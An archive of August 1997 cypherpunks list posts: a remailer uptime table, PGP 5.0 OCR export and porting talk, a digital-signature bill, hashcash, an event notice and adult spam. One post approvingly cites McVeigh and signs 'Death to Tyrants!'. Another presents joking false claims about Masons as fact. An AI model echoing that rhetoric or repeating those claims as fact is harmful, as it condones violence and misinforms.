lmccarth at ducie.cs.umass.edu is _not_ a remailer.
usura at replay.com is _not_ a remailer.
remailer at crynwr.com is _not_ a remailer.

There is no remailer at relay.com.

Groups of remailers sharing a machine or operator:
(cyber mix reno winsock)
(weasel squirrel medusa)
(cracker redneck)
(nym lcs)
(valdeez arrid hera)

The remailer list here has been out of date for some time, but should
be up to date now. I'm still working on updating the web page.

Last update: Mon 11 Aug 97 6:48:21 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
cracker  remailer at anon.efga.org           +++**+++++-+    32:17 100.00%
redneck  config at anon.efga.org             **#**#*#++-*     9:35 100.00%
nym      config at nym.alias.net             ####+#---###    33:53  99.99%
cyber    alias at alias.cyberpass.net        ***+*++**+-*    19:55  99.96%
mix      mixmaster at remail.obscura.com     *+*+*+-+*+-*    40:19  99.95%
winsock  winsock at rigel.cyberpass.net      --------.---  6:12:35  99.92%
replay   remailer at replay.com               ***-*****-*    15:02  99.48%
weasel   config at weasel.owl.de             -+---+++---   2:11:39  99.36%
arrid    arrid at juno.com                   - + -  --+-+  1:59:27  99.31%
valdeez  valdeez at juno.com                 ____ __ _  * 72:57:16  99.10%
hera     goddesshera at juno.com             -  --------   3:59:28  97.40%
reno     middleman at cyberpass.net           +++-++ --      58:16  96.38%
neva     remailer at neva.org                  ++**--- -*  2:04:57  90.02%
jam      remailer at cypherpunks.ca            +*++--- +*  2:13:07  89.14%
squirrel mix at squirrel.owl.de              ----- -   -   4:12:37  74.34%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien






From adam at homeport.org  Mon Aug 11 07:17:40 1997
From: adam at homeport.org (Adam Shostack)
Date: Mon, 11 Aug 1997 22:17:40 +0800
Subject: Ok, maybe we can touch this. :)
In-Reply-To: <199708111344.JAA24033@homeport.org>
Message-ID: <199708111359.JAA24148@homeport.org>



Sorry about the subject; I had misread the license file originally,
thought it said PGP wouldn't take ports from folks in the US; what is
says is that if you're outside the US, you have to assert that you got
no help from PGP employees.

Anyone got a BSDI port working? (I'm hitting errors in lib/pgp/keydb)

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume







From ariel at watsun.cc.columbia.edu  Mon Aug 11 07:44:48 1997
From: ariel at watsun.cc.columbia.edu (Ariel Glenn)
Date: Mon, 11 Aug 1997 22:44:48 +0800
Subject: North American Crypto Archive status
Message-ID: 



Okay, I have a list of files which I couldn't get off the 
North American Crypto Archive site before
it closed, and couldn't find anywhere else; see 
http://www.columbia.edu/~ariel/news/mpj-missing.html
Get out all your old floppies and see if you or your friends 
or even your enemies downloaded any of these.
I've listed the original file names and the byte counts; I'd like to
get the original files all in place before worring about
newer/different versions of them.

Ariel Glenn / AcIS R&D / Columbia University
ariel at columbia.edu
blah blah blah blah...






From aba at dcs.ex.ac.uk  Mon Aug 11 08:19:00 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Mon, 11 Aug 1997 23:19:00 +0800
Subject: Comments on PGP5.0 OCR (was Re: fyi, pgp source now available , internationally)
In-Reply-To: 
Message-ID: <199708111432.PAA00907@server.test.net>




Mark Grant  writes:
> 
> I just wanted to make a few comments on the proofreading, in case anyone
> feels like releasing software in a similar manner in future:
> 
> [...] the OCR-ed pages at HIP included a per-line
> checksum. This was good... but... it also checksummed the whitespace. 
> This wasn't a problem in theory, because tabs were indicated by a special
> character. However, most lines had both tabs *and* spaces and there was no
> way to see where the spaces were because they were overrriden by the tab
> (e.g. "movax,23; Stuff"). 

How about a book full of 2D barcodes?  

As a plus perhaps the book would be more compact, as you could gzip it
first -- the full source tree looks to be over a foot of doublesided
paper!

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: 




> As an interim upgrade path ISPs adopting it could be to bounce
> messages with out payments, and include a nonce, and instructions to
> resend including the nonce.  Set up the filter so that the second post
> gets through.  Spammers often don't have forged reply addresses for
> obvious reasons.  

I don`t think we even want to get into the issue of ISPs being involved 
in hashcash or any other form of postage, a better system is a simple 
user<->user model where the users mail reader can be configured to filter 
email without hashcash, procmail scripts to do this wouldn`t be hard 
either I imagine (disclaimer: I`m no procmail expert, and this may be 
entirely wrong).

Any form of ISP censorship, bouncing or filtering is a bad move.

        Datacomms Technologies data security
       Paul Bradley, Paul at fatmans.demon.co.uk
  Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"






From isparkes at q9f47.dmst02.telekom.de  Mon Aug 11 09:07:01 1997
From: isparkes at q9f47.dmst02.telekom.de (Ian Sparkes)
Date: Tue, 12 Aug 1997 00:07:01 +0800
Subject: Comments on PGP5.0 OCR (was Re: fyi, pgp source now available , internationally)
In-Reply-To: 
Message-ID: <3.0.2.32.19970811174614.0068a410@q9f47.dmst02.telekom.de>



At 15:32 11.08.97 +0100, Adam Back wrote:
>
>Mark Grant  writes:
>> 
>> I just wanted to make a few comments on the proofreading, in case anyone
>> feels like releasing software in a similar manner in future:
>> 
>> [...] the OCR-ed pages at HIP included a per-line
>> checksum. This was good... but... it also checksummed the whitespace. 
>> This wasn't a problem in theory, because tabs were indicated by a special
>> character. However, most lines had both tabs *and* spaces and there was no
>> way to see where the spaces were because they were overrriden by the tab
>> (e.g. "movax,23; Stuff"). 
>
>How about a book full of 2D barcodes?  
>
>As a plus perhaps the book would be more compact, as you could gzip it
>first -- the full source tree looks to be over a foot of doublesided
>paper!
>

How about importing the scanned in source (in electronic form) back into
the States and doing a 'diff' there. This could produce an electronic
patchfile to repair the mistakes in the scanned in code, meaning that the
whole of the code could be cleaned up in one go. This patchfile could then
be exported as it holds no crypto source code. (Somehow this seems *too*
simple. Would this perhaps get up the US gubmint's nose? Have I missed some
nuance or implicit limitation?)


>Adam
>-- 
>Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/
>
>print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
>)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
>






From nospam-seesignature at ceddec.com  Mon Aug 11 09:15:42 1997
From: nospam-seesignature at ceddec.com (nospam-seesignature at ceddec.com)
Date: Tue, 12 Aug 1997 00:15:42 +0800
Subject: Comments on PGP5.0 OCR (was Re: fyi, pgp source now available , internationally)
In-Reply-To: <199708111432.PAA00907@server.test.net>
Message-ID: <97Aug11.120358edt.32259@brickwall.ceddec.com>



On Mon, 11 Aug 1997, Adam Back wrote:

> Mark Grant  writes:
> > 
> > I just wanted to make a few comments on the proofreading, in case anyone
> > feels like releasing software in a similar manner in future:
> > 
> > [...] the OCR-ed pages at HIP included a per-line
> > checksum. This was good... but... it also checksummed the whitespace. 
> > This wasn't a problem in theory, because tabs were indicated by a special
> > character. However, most lines had both tabs *and* spaces and there was no
> > way to see where the spaces were because they were overrriden by the tab
> > (e.g. "movax,23; Stuff"). 
> 
> How about a book full of 2D barcodes?  

Or just put everything through GNU indent and publish the .indent.pro
file, so that after whatever is scanned in, all the .c and .h files will
automagically be fixed.

--- reply to tzeruch - at - ceddec - dot - com ---






From randerso at ece.eng.wayne.edu  Mon Aug 11 09:20:52 1997
From: randerso at ece.eng.wayne.edu (Ryan Anderson)
Date: Tue, 12 Aug 1997 00:20:52 +0800
Subject: Comments on PGP5.0 OCR (was Re: fyi, pgp source now available , internationally)
In-Reply-To: <199708111432.PAA00907@server.test.net>
Message-ID: 



On Mon, 11 Aug 1997, Adam Back wrote:

> How about a book full of 2D barcodes?  
> 
> As a plus perhaps the book would be more compact, as you could gzip it
> first -- the full source tree looks to be over a foot of doublesided
> paper!

Well, remember the reason we did this:  to get the code out of the US in a
way that the government couldn't screw with at all.  Readable text is
clearly a publication, and thus unrestrictable.  There is a chance,
however small, that gzip (and tarring I'd assume) the tree and then
putting it in as text (or bar-coding it) would cloud the issue some.
(Isn't part of this to do with human-readable as opposed to machien
readable?)

Besides, this way it's easier to spot the errors simply by comparing, with
bar-codes and such you'd never ever be able to look at the errors yourself
and find them.

-----------------------------------------------------------------------
Ryan Anderson -      "Who knows, even the horse might sing" 
Wayne State University - CULMA   "May you live in interesting times.."
randerso at ece.eng.wayne.edu                        Ohio = VYI of the USA 
PGP Fingerprint - 7E 8E C6 54 96 AC D9 57  E4 F8 AE 9C 10 7E 78 C9
-----------------------------------------------------------------------






From rah at shipwright.com  Mon Aug 11 09:25:54 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Tue, 12 Aug 1997 00:25:54 +0800
Subject: [Fwd: fwd: Digital Signature Amendment in US House Today]
Message-ID: 




--- begin forwarded text


MIME-Version: 1.0
Date:         Thu, 7 Aug 1997 14:03:23 -0400
Reply-To:     Digital Signature discussion 
Sender:       Digital Signature discussion 
From:         Dan Greenwood 
Subject:      [Fwd: fwd: Digital Signature Amendment in US House Today]
To:           DIGSIG at VM.TEMPLE.EDU

FYI

Received: from mailhub.state.ma.us (mailhub.state.ma.us [146.243.12.156]) by
 maildeliver0.tiac.net (8.8.0/8.8) with ESMTP id NAA19610 for ;
 Thu, 7 Aug 1997 13:51:57 -0400 (EDT)
Received: from vinesgw1.state.ma.us by mailhub.state.ma.us; Thu, 7 Aug 1997
 13:57:05 -0400
Received: by vinesgw1.state.ma.us; Thu, 7 Aug 97 13:51:10 EDT
Date: Thu, 7 Aug 97 12:44:41 EDT
Message-ID: 
X-Priority: 3 (Normal)
To: 
Cc: "Gutierrez-ANF, Louis"  (louis gutierrez)
From: "Greenwood-ITD, Dan"  (dan greenwood)
Subject: fwd: Digital Signature Amendment in US House Today
MIME-Version: 1.0
Content-type: text/plain;
               charset=US-ASCII

Hello,

Below, please find a NIST legislative effort to set national PKI standards
- including CA and digital signature standards ("The Panel shall develop .
 .  standards to ensure consistency among jurisdictions that license
certification authorities").  To the credit of the drafters of this
amendment, they do seek some participation by state gov. and other
stockholders to inform the process.  Also to their credit, they are seeking
ways to develop national uniformity in this area generally.

Questions: why is this focused on the license of CAs and not on the more
desirable "accreditation" standards that must be developed?  Perhaps it is
for the good that accreditation of CAs remain primarily a private sector
activity (outside the scope of Federal government direct control and
regulation) - but this NIST language seems to assume multi-jurisdictional
license of CAs (what other requirements will the federal government seek to
impose through license - key escrow?  pricing? particular technological
implementations?  pre-conceived business models?)  What will be the market
impacts of such license requirements?

This raises some interesting questions about where to strike the optimal
balance between top-down federal government's national consistent standards
versus working with private sector leadership/self-governance organizations
to develop national standards (hence allowing more innovation,
responsiveness to change and (I believe) better standards for this very
dynamic and young area).  Can this be done through "license" - perhaps so.
Assuming we create the right license criteria - such as: "you are deemed to
be licensed if you have been accredited by XXX") - then we just need to
make sure that accreditation (or some level of accred) is minimally
adequate for the interests that would have been served by license.

For that matter, the question should be asked "licensed to do what?"  If
the federal government has a particular federal agency that needs to accept
outside certificates to authenticate a citizen or business, then I can see
them requiring that the issuing CA be licensed.  Beyond such a scenario,
why should the federal government require CAs to be licensed just to do
business?  If license is voluntary and not mandatory - what government
benefits or harms would follow from being licensed or not? Will export
control be used to force compliance with license requirements?

The federal government can lend a helpful hand in the process of designing
appropriate license criteria for federal programs, and that criteria could
be useful at the state gov. and private sector levels as well.  However, it
seems to me that it would be unwelcome and unwise at this point in time for
the federal government to arrogate to itself the power and jurisdiction to
regulate this industry in a complete way through license (it has been said
that the power to tax is the power to destroy - that goes double for the
power to license).  In the future, if there develops a demonstrable problem
with consistent CA practices evolved by market based solutions  (as
facilitated by accreditation), then I think a credible case could be made
at that time for the federal government to step in with some standards in
the interests of inter-state commerce.  At that time, any standards should
be narrowly tailored to actual market failures and specific non-uniformity
issues.  Until then, we should use the considerable resources envisioned by
the amendment (see below) to encourage private sector leadership and
innovation in this area.

Of course, through purchase power, the public sector has the right and the
obligation to apply pressure through aggregation of demand as a way to get
interoperable products.  Any such pressure should be exerted in a manner
that is consistent with current private sector electronic commerce
practices and needs.  It is relevant to point to the NASIRE CA
accreditation initiative in this regard, is an important effort to work
with the private sector to create voluntary standards for the use of
digital signature technology.

Regards,
Dan
-------------
Original Text
From: Adam White Scoville , on 7/28/97 5:56 PM:
To: ""Greenwood-ITD

Hello -
I'm glad we touched base at the NIST conference - I still would like to ask
you a couple questions on the pre-emption issue. But first, the point of
_this_ message is that I though you would be interested to know that the
Technology Subcommittee of the House Committee on Science added about an
hour ago this amendment (among others) to HR 1903, the NIST "Computer
Security Enhancement Act of 1997."


(a) National Policy Panel - The Under Secretary of Commerce for Technology
shall establish a National Policy Panel for Digital Signatures, composed of
nongovernment and government technical and legal experts on the
implementation of digital signature technologies, individuals from
companies offerring digital signature products and services, State
officials, including officials from States which have enacted statutes
establishing digital signature infrastructures, and representative
individuals from the interested public.
(b) Responsibilities - The Panel shall serve as a forum for exploring all
relevant factors associated with the development of a national digital
signature infrastructure based on uniform standards that will enable the
widespread availability and use of digital signature systems. The Panel
shall develop -
(1) Model practices and procedures for certification authorities to ensure
accuracy, reliability, and security of operations associated with issuing
and managing certificates;
(2) standards to ensure consistency among jurisdictions that license
certification authorities; and
(3) audit standards for certification authorities.


Adam White Scoville
Center for Democracy & Technology


Adam White Scoville
adville at cdt.org
adam.scoville at bc.edu

If you wish to send me a secure message, encrypt it with PGP, using my
public key available at . For more
information about PGP and encryption, visit . A free
version of PGP (for  MacOS and Windows) is available at
. A free version of the popular Eudora
mail program (also for both MacOS and Windows) which incorporates PGP is
available at .

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From tcmay at got.net  Mon Aug 11 09:30:21 1997
From: tcmay at got.net (Tim May)
Date: Tue, 12 Aug 1997 00:30:21 +0800
Subject: Distributing food without a license
In-Reply-To: <199708110653.AAA21997@wombat.sk.sympatico.ca>
Message-ID: 



At 10:56 PM -0700 8/10/97, TruthMailer wrote:

>  The government claimed they only wanted to ban the *bad* guns,
>but as Tim May pointed out, now it is theoretically illegal in
>some places for a citizen to carry a paring knife home from the
>store. Of course, in practice, these laws will only be used
>against *bad* people. Mary Tyler Moore has nothing to worry about.

Cops here in California are quite open about the law being a law they can
use to bust or harass undesirables. Like an increasing number of laws, the
law is applied capriciously and politically.

A related example is the arrest, ticketing, jailing, etc. of so-called
"homeless activists" for the crime of distributing soup and other forms of
food in Santa Cruz (and San Francisco, other cities, etc.)

The apparent crime is not that they were trespassing or blocking traffic,
or somesuch, but that they were "preparing and distributing food without a
license."

I attended a City Council meeting and spoke up on this point. I asked that
if the "Food Not Bombs" folks were being arrested for distributing food
without a license, that the cops also make arrests of the various groups at
church picnics, Boy Scout outings, family picnics, etc., who also prepare
and distribute food to groups. (Cooked under the same conditions, and
distributed the same way.)

The Council showed no reaction to my point, not that I expected to have any
effect (dozens of others made similar points, that this was selective
enforcement). The cops were told to keep busting people for distributing
food, but no orders were given against church and social groups.

"Some food distributors are more equal than others." Selective enforcement
is the real power of the State.

And they wonder why McVeigh said "Enough!!."

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From tcmay at got.net  Mon Aug 11 09:58:01 1997
From: tcmay at got.net (Tim May)
Date: Tue, 12 Aug 1997 00:58:01 +0800
Subject: Masons and Fnords
In-Reply-To: <199708111308.GAA18202@toad.com>
Message-ID: 



At 2:16 AM -0700 8/11/97, Peter Trei wrote:

>Nope. While many of the Founders were Masons, by no means all were.
>In particular, there is no evidence that Jefferson was ever a
>member.

Jefferson laid the foundation stones of the University of Virginia by
strict Masonic principles. At this point he was 34th Degree, and hence all
records were moved to the inner sanctorium, accessible only to Masonic
historians.

>Aside from a nit (it's not a temple, but rather a memorial: "The
>George Washington Masonic National Memorial" to be exact), this is
>largely correct. It's a really grand, funky piece of architecture,
>and open to the public, with free guided tours. Over 300 feet tall,
>and on the highest point in Alexandria, it has a *very* impressive
>view from the top, taking in all of DC and miles around.

We referred to it by the name others used: the Masonic Temple. (When I was
growing up, in the 50s and 60s.). My hunch is that "Masonic National
Memorial" came about when legal experts advised the National Park Service
that "temple" may not be used in the actual name of any park.

Possibly the Papist President did this, to diminish the role of the Masons.
All part of the 6,000 year history of the Battle. Oswald was a Mason, of
course.

>Those in the Silicon Valley area might also want to visit the
>Rosicrucian Museum in San Jose, a similarly funky building,
>belonging to an unrelated group.

Yes, I was transferred from the Alexandria Chapter, Knights Templars, to
the San Jose Chapter, and instructed to find a job which would allow me to
live in close proximity to the Sepulchre of the Rosy Cross. This is why I
had to work for Intel, located a few thousand cubits away (several miles,
for you heathens). My job there was arranged by Robert Noyce and Gordon
Moore, both Masons of course.

Praise be to Hiram!

--Tim May, OTE, RC, KT


There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From rah at shipwright.com  Mon Aug 11 10:04:10 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Tue, 12 Aug 1997 01:04:10 +0800
Subject: DCSB: Elliptic Curve Cryptography and Digital Commerce
Message-ID: 




--- begin forwarded text


X-Sender: rah at mail.shipwright.com
Mime-Version: 1.0
Date: Mon, 11 Aug 1997 11:13:20 -0400
To: dcsb at ai.mit.edu, dcsb-announce at ai.mit.edu
From: Robert Hettinga 
Subject: DCSB: Elliptic Curve Cryptography and Digital Commerce
Sender: bounce-dcsb at ai.mit.edu
Precedence: bulk
Reply-To: Robert Hettinga 

-----BEGIN PGP SIGNED MESSAGE-----



                 The Digital Commerce Society of Boston

                              Presents
                         Dr. Christof Paar
                  Cryptography and Data Security Group,
                   Worcester Polytechnic Institute

             Elliptic Curve Cryptography and Digital Commerce



                        Tuesday, September 2, 1997
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA



Elliptic Curve (EC) public-key cryptosystems have matured from an area of
mainly theoretical interest to a highly practical security tool. EC are a
general-purpose public-key scheme which can provide tasks such as digital
signature, key establishment, and encryption. EC are extremely attractive
because the required operand length is dramatically reduced compared to
RSA and DSA-type algorithms: The security of an RSA system with 1024 bits
corresponds to the security of an EC system with only 160 bits. This can
result in considerably faster processing times, e.g., for digital
signature verification, and shorter certificates. One application area of
special interest are smart cards.

This talk will give a brief, non-technical introduction to EC system.
Current security estimations relatively to RSA will be provided. We will
talk about performance and the adoption of EC systems in standard bodies.


Christof Paar leads the Cryptography and Data Security group in the ECE
department of Worcester Polytechnic Institute.  Dr. Paar's research
interests include security issues in wireless and ATM networks, smart
cards, efficient implementation of elliptic and hyperelliptic curve
public-key algorithms, and hardware implementation of cryptosystems.  Dr.
Christof Paar received a BSEE degree from the Technical College of
Cologne, Germany.  He obtained an MSEE degree from the University of
Siegen, Germany, and did graduate research at Michigan Technological
University.  From 1991-1994 he worked as research fellow at the Institute
for Experimental Mathematics in Essen, Germany, from where he received a
Ph.D. in Electrical Engineering.  In 1993 and '94 he spent time as a
visiting researcher at the University of Massachusetts at Amherst.


This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, September 2, 1997, from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, on One Federal Street. The price for lunch is
$30.00. This price includes lunch, room rental, various A/V hardware, and
the speaker's lunch. ;-).  The Harvard Club *does* have dress code: jackets
and ties for men (and no sneakers or jeans), and "appropriate business
attire" (whatever that means), for women.  Fair warning: since we purchase
these luncheons in advance, we will be unable to refund the price of your
lunch if the Club finds you in violation of the dress code.

We will attempt to record this meeting and put it on the web in RealAudio
format at some future date

We need to receive a company check, or money order, (or, if we *really*
know you, a personal check) payable to "The Harvard Club of Boston", by
Saturday, August 30, or you won't be on the list for lunch.  Checks
payable to anyone else but The Harvard Club of Boston will have to be
sent back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston", in the amount of $30.00.

If anyone has questions, or has a problem with these arrangements (We've
had to work with glacial A/P departments more than once, for instance),
please let us know via e-mail, and we'll see if we can work something
out.

Upcoming speakers for DCSB are:

October   Peter Cassidy        Military Fiat and Digital Commerce
November  Carl Ellison         Identity and Certification for Electronic
                                Commerce

We are actively searching for future speakers.  If you are in Boston on
the first Tuesday of the month, and you would like to make a
presentation to the Society, please send e-mail to the DCSB Program
Commmittee, care of Robert Hettinga,  .

For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to  .
If you want to subscribe to the DCSB e-mail list, send "subscribe dcsb" in
the body of a message to  .

We look forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston


- -----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBM+85YMUCGwxmWcHhAQFJFQf+IzAfWbsqMhHNE0dmBeIhj5li2NE9l5VH
GwEnorE/FZ9iyg+ZMX4MvsYNwh0LjswIZBe1tCPIoRHqSJ+DDL8BqPzMdjYUONBz
aJVz1x15AgJNVgw4Ub2FzNes6nj2uYt6OyYoemPdmUAefew7+nnwGJAO8vmBxUjI
Ww44e+MM8dzYaCPu123Tk1gNInFtFJQC+Usw2ExgZdVU7bgciWjt5WEE8V4tR5QW
I/RYIm4GYADbAY6U8M7vJ0eK5dcqRhbOLxGh48pmaK24nO3WAN2OS3c4ZKXWIZf+
vch4P8C3nfXLnC3NsbPIG1aa/FrWy3msg6WbQP/v3e5AfMUrFixWnw==
=kKJN
-----END PGP SIGNATURE-----

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo at ai.mit.edu
In the body of the message, write:  unsubscribe dcsb-announce
Or, to subscribe,           write:  subscribe dcsb-announce
If you have questions, write to me at Owner-DCSB at ai.mit.edu

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From zooko at xs4all.nl  Mon Aug 11 10:10:05 1997
From: zooko at xs4all.nl (Zooko Journeyman)
Date: Tue, 12 Aug 1997 01:10:05 +0800
Subject: HIP hip hooray
Message-ID: <199708111643.SAA20068@xs1.xs4all.nl>



HIP rocked.  I'm still trying to adjust to the mundanity
of everyday life.  I loved meeting some cpunks in Real
Life.


Here are a couple of relevant URLs.


--Z


http://magazine.dds.nl/english/XArtikel.phtml?ArtID=179&KatID=7
http://magazine.dds.nl/english/XArtikel.phtml?ArtID=156&KatID=7
http://magazine.dds.nl/english/XArtikel.phtml?ArtID=172&KatID=7
http://magazine.dds.nl/english/XArtikel.phtml?ArtID=174&KatID=7
http://magazine.dds.nl/english/XArtikel.phtml?ArtID=187&KatID=7







From PADGETT at hobbes.orl.lmco.com  Mon Aug 11 11:02:33 1997
From: PADGETT at hobbes.orl.lmco.com (A. Padgett Peterson P.E. Information Security)
Date: Tue, 12 Aug 1997 02:02:33 +0800
Subject: Feds Seek PKI Bids
Message-ID: <970811135334.2020461b@hobbes.orl.lmco.com>




>USG published a solicitation today in the CBD for a
>Public Key Infrastructure which outlines the system
>requirements:

>   http://jya.com/pkicbd.htm


Interesting from what is *not* there - any mention of key recovery/key 
escow. Looks like they may finally understand what a Certificate Authority
is (not holding breath). Do not think much of appelations (Classic & Gold)
and suspect they may need more than two but sounds like a good start.

					Warmly,
						Padgett






From partner at adultclubs.com  Tue Aug 12 02:32:57 1997
From: partner at adultclubs.com (partner at adultclubs.com)
Date: Tue, 12 Aug 1997 02:32:57 -0700 (PDT)
Subject: Partner Program Pays $9.00 Now!
Message-ID: <199708120932.CAA29921@toad.com>


_____________________________________________________________
This is a webmaster mailing from a qualified list of subscribers. 
 If you wish to be removed  from our future mailings, you MUST reply with the word 
 "Remove" in the Subject line and  we will automatically block you from our future mailings.
______________________________________________________________

Hello Adult Webmaster,

Make real $$MONEY$$ with Adult Clubs International. We pay you $9.00 for each $14.95 subscriber you send us. No Questions asked, send us a subscriber from your site and you you will receive $9.00

Are you sending your traffic to a site that only pay $0.03 - $0.05  per click and at the end of the month find out that the 2,500 clicks only registered 1,400.

Now is the time to join the Partner Plus+ Program. You need only place 2 lines of code on your page and we do the rest. We serve the banners from our site so there is no cost for bandwidth to you.

WE OFFER THE HIGHEST PARTNER PROGRAM PAY OUT IN THE INDUSTRY!!!!!

Register Today!

http://www.adultclubs.com/partner.htm








From nospam-seesignature at ceddec.com  Mon Aug 11 12:16:33 1997
From: nospam-seesignature at ceddec.com (nospam-seesignature at ceddec.com)
Date: Tue, 12 Aug 1997 03:16:33 +0800
Subject: Can't touch this, ugly Americans! (PGP License file)
In-Reply-To: <199708111344.JAA24033@homeport.org>
Message-ID: <97Aug11.145941edt.32258@brickwall.ceddec.com>



On Mon, 11 Aug 1997, Adam Shostack wrote:

> First off, congratulations and thanks to Stale and everyone else for
> scanning in the source to PGP5.0i (http://www.ifi.uio.no/pgp/)
> 
> However, theres an ugly problem with the license.
> (http://www.ifi.uio.no/pgp/pgp50i-license.txt)
> 
> In Section 1.c.(d), permission is given to port PGP to other
> platforms.  However, permission to distribute those ports is
> explicitly denied.
> 
> Could the license be modified to allow people who port the software to
> redisctribute ports?  There is enough FUD about using PGP without PGP,
> Inc contributing to that by overly tight licensing.
> 
> Adam

Or what do you do about bugs?  It mentions corrections, but not who to
send them to.

On DEC Alpha/axp under Linux, include/pgpUsuals.h has a test for a big
ULONG_MAX that defines HAVE64 as 1 on 64 bit machines like the alpha

But the very next test has #ifndef HAVE64 where there is a typedef for
word64, which won't happen.  But if HAVE64 is 1, in pgpMD5.c it will
really want word64 defined or it will bomb. 

Something is wrong, but if I copy the typedef, it seems to get further
(compiling as we speak - the old UDBs aren't the fastest alphas).

Now, where should I send this information or the patch?

--- reply to tzeruch - at - ceddec - dot - com ---






From nospam-seesignature at ceddec.com  Mon Aug 11 12:32:35 1997
From: nospam-seesignature at ceddec.com (nospam-seesignature at ceddec.com)
Date: Tue, 12 Aug 1997 03:32:35 +0800
Subject: Comments on PGP5.0 OCR (was Re: fyi, pgp source now available , internationally)
In-Reply-To: 
Message-ID: <97Aug11.152045edt.32259@brickwall.ceddec.com>



On Mon, 11 Aug 1997, Ryan Anderson wrote:

> On Mon, 11 Aug 1997, Adam Back wrote:
> 
> > How about a book full of 2D barcodes?  
> > 
> > As a plus perhaps the book would be more compact, as you could gzip it
> > first -- the full source tree looks to be over a foot of doublesided
> > paper!

It is about that girth, although I only have the first 5 volumes.  They
should have hand-huffman-coded the source :).

> Well, remember the reason we did this:  to get the code out of the US in a
> way that the government couldn't screw with at all.  Readable text is
> clearly a publication, and thus unrestrictable.  There is a chance,
> however small, that gzip (and tarring I'd assume) the tree and then
> putting it in as text (or bar-coding it) would cloud the issue some.
> (Isn't part of this to do with human-readable as opposed to machien
> readable?)

Not quite.  If you read closely, the EAR says something about reserving
judgment on OCR publications.  You didn't use a specific OCR font, but you
did put all kinds of other OCR helps in, which should by itself cloud the
issue.  It would be nice if it was resolved.

Or if PGP came out with the "PGP crypto source quarterly", now that I have
